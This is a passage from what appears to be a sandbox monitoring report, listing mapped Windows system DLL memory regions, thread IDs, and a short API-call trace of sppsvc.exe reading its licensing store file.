0x7ffbeb1fffff entry_point = 0x7ffbeb1c0000 region_type = mapped_file name = "cemapi.dll" filename = "\\Windows\\System32\\cemapi.dll" (normalized: "c:\\windows\\system32\\cemapi.dll") Region: id = 15530 start_va = 0x7ffbf27c0000 end_va = 0x7ffbf2807fff entry_point = 0x7ffbf27c0000 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 15531 start_va = 0x7ffbf4ae0000 end_va = 0x7ffbf4ba5fff entry_point = 0x7ffbf4ae0000 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 15532 start_va = 0x7ffbf5340000 end_va = 0x7ffbf534bfff entry_point = 0x7ffbf5340000 region_type = mapped_file name = "dsclient.dll" filename = "\\Windows\\System32\\dsclient.dll" (normalized: "c:\\windows\\system32\\dsclient.dll") Region: id = 15533 start_va = 0x7ffbf5350000 end_va = 0x7ffbf5360fff entry_point = 0x7ffbf5350000 region_type = mapped_file name = "userdatatypehelperutil.dll" filename = "\\Windows\\System32\\UserDataTypeHelperUtil.dll" (normalized: "c:\\windows\\system32\\userdatatypehelperutil.dll") Region: id = 15534 start_va = 0x7ffbf5460000 end_va = 0x7ffbf58c9fff entry_point = 0x7ffbf5460000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 15535 start_va = 0x7ffbf69e0000 end_va = 0x7ffbf6a06fff entry_point = 0x7ffbf69e0000 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 15536 start_va = 0x7ffbf7160000 end_va = 0x7ffbf7441fff entry_point = 0x7ffbf7160000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 15537 start_va = 0x7ffbf9380000 end_va = 0x7ffbf96f5fff entry_point = 0x7ffbf9380000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 15538 start_va = 0x7ffbf9d80000 end_va = 0x7ffbf9d9bfff entry_point = 0x7ffbf9d80000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 15539 start_va = 0x7ffbfbb40000 end_va = 0x7ffbfbc15fff entry_point = 0x7ffbfbb40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 15540 start_va = 0x7ffbfcbc0000 end_va = 0x7ffbfccf0fff entry_point = 0x7ffbfcbc0000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 15541 start_va = 0x7ffbfdc20000 end_va = 0x7ffbfdc37fff entry_point = 0x7ffbfdc20000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 15542 start_va = 0x7ffbfe5c0000 end_va = 0x7ffbfe5d2fff entry_point = 0x7ffbfe5c0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 15543 start_va = 0x7ffbffbe0000 end_va = 0x7ffbffc11fff entry_point = 0x7ffbffbe0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 15544 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 15545 start_va = 0x7ffbffeb0000 end_va = 0x7ffbffecefff entry_point = 0x7ffbffeb0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 15546 start_va = 0x7ffc000a0000 end_va = 0x7ffc000aafff entry_point = 0x7ffc000a0000 region_type = mapped_file name = "ntlmshared.dll" filename = "\\Windows\\System32\\NtlmShared.dll" (normalized: "c:\\windows\\system32\\ntlmshared.dll") Region: id = 15547 start_va = 0x7ffc000b0000 end_va = 0x7ffc0010efff entry_point = 0x7ffc000b0000 region_type = mapped_file name = "msv1_0.dll" filename = "\\Windows\\System32\\msv1_0.dll" (normalized: "c:\\windows\\system32\\msv1_0.dll") Region: id = 15548 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 15549 start_va = 0x7ffc002c0000 end_va = 0x7ffc002d3fff entry_point = 0x7ffc002c0000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 15550 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 15551 start_va = 0x7ffc004c0000 end_va = 0x7ffc004ebfff entry_point = 0x7ffc004c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 15552 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 15553 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 15554 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 15555 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 15556 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 15557 start_va = 0x7ffc00920000 end_va = 0x7ffc00930fff entry_point = 0x7ffc00920000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 15558 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 15559 start_va = 0x7ffc01190000 end_va = 0x7ffc01350fff entry_point = 0x7ffc01190000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 15560 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15561 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 15562 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15563 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 15564 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 15565 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 15566 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15567 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15568 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 15569 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15570 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15571 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 15572 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15573 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 1372 os_tid = 0xecc Thread: id = 1373 os_tid = 0xec8 Thread: id = 1374 os_tid = 0xeac Thread: id = 1375 os_tid = 0xea4 Thread: id = 1376 os_tid = 0xea0 Thread: id = 1377 os_tid = 0x7a4 Thread: id = 1378 os_tid = 0xb0c Process: id = "294" image_name = "sppsvc.exe" filename = "c:\\windows\\system32\\sppsvc.exe" page_root = "0x38254000" os_pid = "0xe5c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\sppsvc.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:000847f1" [0xc000000f], "LOCAL" [0x7] Region: id = 15574 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 15575 start_va = 0x3255980000 end_va = 0x3255986fff entry_point = 0x0 region_type = private name = "private_0x0000003255980000" filename = "" Region: id = 15576 start_va = 0x3255990000 end_va = 0x325599ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003255990000" filename = "" Region: id = 15577 start_va = 0x32559a0000 end_va = 0x32559b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032559a0000" filename = "" Region: id = 15578 start_va = 0x32559c0000 end_va = 0x3255a3ffff entry_point = 0x0 region_type = private name = "private_0x00000032559c0000" filename = "" Region: id = 15579 start_va = 0x3255a40000 end_va = 0x3255a46fff entry_point = 0x0 region_type = private name = "private_0x0000003255a40000" filename = "" Region: id = 15580 start_va = 0x3255a50000 end_va = 0x3255a55fff entry_point = 0x3255a50000 region_type = mapped_file name = "sppsvc.exe.mui" filename = "\\Windows\\System32\\en-US\\sppsvc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sppsvc.exe.mui") Region: id = 15581 start_va = 0x3255a60000 end_va = 0x3255a60fff entry_point = 0x0 region_type = private name = "private_0x0000003255a60000" filename = "" Region: id = 15582 start_va = 0x3255a70000 end_va = 0x3255a70fff entry_point = 0x0 region_type = private name = "private_0x0000003255a70000" filename = "" Region: id = 15583 start_va = 0x3255a80000 end_va = 0x3255a8ffff entry_point = 0x0 region_type = private name = "private_0x0000003255a80000" filename = "" Region: id = 15584 start_va = 0x3255a90000 end_va = 0x3255a9ffff entry_point = 0x0 region_type = private name = "private_0x0000003255a90000" filename = "" Region: id = 15585 start_va = 0x3255ab0000 end_va = 0x3255baffff entry_point = 0x0 region_type = private name = "private_0x0000003255ab0000" filename = "" Region: id = 15586 start_va = 0x3255bb0000 end_va = 0x3255c6dfff entry_point = 0x3255bb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15587 start_va = 0x3255c70000 end_va = 0x3255ceffff entry_point = 0x0 region_type = private name = "private_0x0000003255c70000" filename = "" Region: id = 15588 start_va = 0x3255cf0000 end_va = 0x3255d6ffff entry_point = 0x0 region_type = private name = "private_0x0000003255cf0000" filename = "" Region: id = 15589 start_va = 0x3255d80000 end_va = 0x3255d8ffff entry_point = 0x0 region_type = private name = "private_0x0000003255d80000" filename = "" Region: id = 15590 start_va = 0x3255d90000 end_va = 0x3255f17fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003255d90000" filename = "" Region: id = 15591 start_va = 0x3255f20000 end_va = 0x32560a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003255f20000" filename = "" Region: id = 15592 start_va = 0x32560b0000 end_va = 0x325616ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032560b0000" filename = "" Region: id = 15593 start_va = 0x3256170000 end_va = 0x325626ffff entry_point = 0x0 region_type = private name = "private_0x0000003256170000" filename = "" Region: id = 15594 start_va = 0x3256270000 end_va = 0x32562effff entry_point = 0x0 region_type = private name = "private_0x0000003256270000" filename = "" Region: id = 15595 start_va = 0x32562f0000 end_va = 0x325636ffff entry_point = 0x0 region_type = private name = "private_0x00000032562f0000" filename = "" Region: id = 15596 start_va = 0x3256370000 end_va = 0x32566a6fff entry_point = 0x3256370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 15597 start_va = 0x7df5ff820000 end_va = 0x7ff5ff81ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff820000" filename = "" Region: id = 15598 start_va = 0x7ff7cd930000 end_va = 0x7ff7cda2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7cd930000" filename = "" Region: id = 15599 start_va = 0x7ff7cda30000 end_va = 0x7ff7cda52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7cda30000" filename = "" Region: id = 15600 start_va = 0x7ff7cda55000 end_va = 0x7ff7cda56fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cda55000" filename = "" Region: id = 15601 start_va = 0x7ff7cda57000 end_va = 0x7ff7cda57fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cda57000" filename = "" Region: id = 15602 start_va = 0x7ff7cda58000 end_va = 0x7ff7cda59fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cda58000" filename = "" Region: id = 15603 start_va = 0x7ff7cda5a000 end_va = 0x7ff7cda5bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cda5a000" filename = "" Region: id = 15604 start_va = 0x7ff7cda5c000 end_va = 0x7ff7cda5dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cda5c000" filename = "" Region: id = 15605 start_va = 0x7ff7cda5e000 end_va = 0x7ff7cda5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7cda5e000" filename = "" Region: id = 15606 start_va = 0x7ff7ce090000 end_va = 0x7ff7ce6bdfff entry_point = 0x7ff7ce090000 region_type = mapped_file name = "sppsvc.exe" filename = "\\Windows\\System32\\sppsvc.exe" (normalized: "c:\\windows\\system32\\sppsvc.exe") Region: id = 15607 start_va = 0x7ffbeb200000 end_va = 0x7ffbeb215fff entry_point = 0x7ffbeb200000 region_type = mapped_file name = "clipc.dll" filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll") Region: id = 15608 start_va = 0x7ffbeb220000 end_va = 0x7ffbeb241fff entry_point = 0x7ffbeb220000 region_type = mapped_file name = "cryptxml.dll" filename = "\\Windows\\System32\\cryptxml.dll" (normalized: "c:\\windows\\system32\\cryptxml.dll") Region: id = 15609 start_va = 0x7ffbeb630000 end_va = 0x7ffbeb7aafff entry_point = 0x7ffbeb630000 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 15610 start_va = 0x7ffbfbe40000 end_va = 0x7ffbfbe75fff entry_point = 0x7ffbfbe40000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 15611 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 15612 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 15613 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 15614 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 15615 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 15616 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 15617 start_va = 0x7ffc00920000 end_va = 0x7ffc00930fff entry_point = 0x7ffc00920000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 15618 start_va = 0x7ffc01190000 end_va = 0x7ffc01350fff entry_point = 0x7ffc01190000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 15619 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15620 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 15621 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 15622 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 15623 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15624 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15625 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 15626 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15627 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 15628 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 15629 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15630 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 1379 os_tid = 0xdc0 Thread: id = 1380 os_tid = 0xfac Thread: id = 1381 os_tid = 0x674 [0162.067] GetFileAttributesW (lpFileName="C:\\Windows\\System32\\spp\\store\\2.0\\data.dat.tmp" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat.tmp")) returned 0xffffffff [0162.068] GetLastError () returned 0x2 [0162.073] GetFileAttributesW (lpFileName="C:\\Windows\\System32\\spp\\store\\2.0\\data.dat.bak" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat.bak")) returned 0xffffffff [0162.073] GetLastError () returned 0x2 [0162.073] GetFileAttributesW (lpFileName="C:\\Windows\\System32\\spp\\store\\2.0\\data.dat.tmp" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat.tmp")) returned 0xffffffff [0162.073] GetLastError () returned 0x2 [0162.074] CreateFileW (lpFileName="C:\\Windows\\System32\\spp\\store\\2.0\\data.dat" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80000002, hTemplateFile=0x0) returned 0x1d0 [0162.077] GetFileSize (in: hFile=0x1d0, lpFileSizeHigh=0x32562ee68c | out: lpFileSizeHigh=0x32562ee68c*=0x0) returned 0x7a80 [0162.082] GetFileAttributesW (lpFileName="C:\\Windows\\System32\\spp\\store\\2.0\\data.dat.bak" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat.bak")) returned 0xffffffff [0162.082] GetLastError () returned 0x2 [0162.082] GetFileAttributesW (lpFileName="C:\\Windows\\System32\\spp\\store\\2.0\\data.dat.tmp" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat.tmp")) returned 0xffffffff [0162.083] GetLastError () returned 0x2 [0162.083] CreateFileW (lpFileName="C:\\Windows\\System32\\spp\\store\\2.0\\data.dat" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80000002, hTemplateFile=0x0) returned 0x1d0 [0162.083] GetFileSize (in: hFile=0x1d0, lpFileSizeHigh=0x32562ee68c | out: lpFileSizeHigh=0x32562ee68c*=0x0) returned 0x7a80 [0162.084] ReadFile (in: hFile=0x1d0, lpBuffer=0x3255aefb00, nNumberOfBytesToRead=0x7a80, lpNumberOfBytesRead=0x32562ee798, lpOverlapped=0x0 | out: lpBuffer=0x3255aefb00*, lpNumberOfBytesRead=0x32562ee798*=0x7a80, lpOverlapped=0x0) returned 1 [0202.300] _wcsicmp (_String1="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 0 [0202.300] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32562eec10 | out: lpSystemTimeAsFileTime=0x32562eec10*(dwLowDateTime=0x2d042de5, dwHighDateTime=0x1d3d44e)) Thread: id = 1382 os_tid = 0xe64 Thread: id = 1383 os_tid = 0xe60